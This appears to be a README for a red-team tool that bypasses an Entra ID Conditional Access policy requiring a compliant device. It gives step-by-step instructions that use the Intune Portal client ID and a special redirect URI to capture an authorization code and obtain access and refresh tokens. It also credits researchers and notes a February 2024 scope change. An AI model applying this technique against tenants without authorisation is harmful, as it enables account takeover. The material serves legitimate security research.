A Conditional Access Policy in Entra ID which only require a compliant device can be bypassed using Intune Portal client ID and a special redirect URI.
Note that any other Conditional Access Policies and conditions you’ve configured in your tenant will still apply!
-
Execute the script.
-
Open the Browser Developer tools and authenticate normally.
-
After clicking on "Continue" you should see an error message in the Browser console:
- Click on the URL in the Browser console (ms-appx-web://...) this will open the URL in a new tab. Copy the content of the code parameter into the script window. This will get you an access and refresh token (stored in $token):
The refresh token can, for example, be used to obtain an access token for Azure AD Graph for example using https://github.com/zh54321/EntraTokenAid.git.
Update February 2024: Microsoft changed the pre-consented scopes on the Azure AD Graph API (user_impersonation --> Service_PrincipalEndpoint.Read.All,User.Read). Therefore, it is not possible anymore to run tools like ROADrecon.
- For the write-up: TokenSmith – Bypassing Intune Compliant Device Conditional Access by JUMPSEC
- For discovery and sharing:
- TEMP43487580 (@TEMP43487580)
- Dirk-jan, (@_dirkjan)